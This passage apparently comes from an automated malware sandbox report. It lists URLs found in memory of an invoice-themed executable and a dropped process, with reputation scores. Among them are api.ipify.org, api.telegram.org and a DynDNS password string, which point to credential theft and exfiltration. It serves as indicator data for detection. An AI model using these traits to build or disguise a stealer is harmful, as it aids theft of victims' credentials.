http://www.jiyu-kobo.co.jp/9	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comedFB	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmY	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307573750.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307547855.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307630920.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307593958.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349450295.0000000005EDA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://fontfabrik.com	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org4	ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comessedK	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/0	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0-eo	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://VEVgTqSNHWikc.orgD	ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/.	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303423712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303953142.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303491476.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303547143.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303113304.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304121403.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303924617.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303459883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303190453.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303711642.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303288048.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304055892.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304005746.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303259684.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303777091.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303357363.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comigXje	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/Y0m	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com9	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comalsq	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comsivFf	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ascendercorp.com/typedesigners.html	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307345140.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304196469.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304651333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304139159.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305855891.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306476107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304491242.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303482107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305929932.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304437139.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307312499.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304413252.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306400487.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303216869.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303104333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306139248.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304750887.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304466931.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305354155.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303996945.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303155186.0000000005F13000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comF.	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comR.TTF	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301689714.0000000005F13000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307540852.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comK	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/FL	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
